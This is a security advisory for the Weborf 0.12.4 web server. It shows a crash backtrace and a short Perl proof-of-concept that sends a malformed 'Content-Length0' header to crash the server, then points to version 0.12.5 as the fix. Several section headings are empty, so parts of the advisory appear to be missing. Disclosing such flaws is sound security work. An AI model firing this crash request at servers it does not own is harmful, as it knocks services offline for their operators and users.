[Discussion]
[Software]
[Vendor Product Description]
Weborf is a lightweight webserver designed to rapidly share
directories. Runs on POSIX systems.
Source:
http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.4.tar.gz
[Advisory Timeline]
[Bug Summary]
[Impact]
[Affected Version]
[Bug Description and Proof of Concept]
(gdb) bt
#0 0xb7ec8bd1 in memcpy () from /lib/tls/i686/cmov/libc.so.6
#1 0x0804dec5 in get_param_value (
http_param=0x805af95 "HTTP/1.1\r\nHost:
http://www.dclabs.com.br\r\nContent-Length0\r\n",
parameter=0x804fe79 "Content-Length", buf=0xb3e46095 "", size=15,
param_len=14) at utils.c:281
#2 0x0804cfa1 in read_post_data (sock=0, connection_prop=0xb3e462f8,
read_b=0xb3e462d4) at instance.c:1173
#3 0x00000000 in ?? ()
[PoC]
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request…\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET http://www.dclabs.com.br HTTP/1.1\r\n";
print $socket "Host: http://www.dclabs.com.br\r\n";
print $socket "Content-Length0\r\n\r\n";
sleep(1);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}
All flaws described here were discovered and researched by:
Rodrigo Escobar aka ipax.
DcLabs Security Research Group
ipax (at) dclabs <dot> com <dot> br
[Patch(s) / Workaround]
Upgrade to the latest version at:
http://galileo.dmi.unict.it/wiki/weborf/lib/exe/fetch.php?media=download:weborf_0.12.5.tar.gz
[Greetz]
DcLabs Security Research Group.
–
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br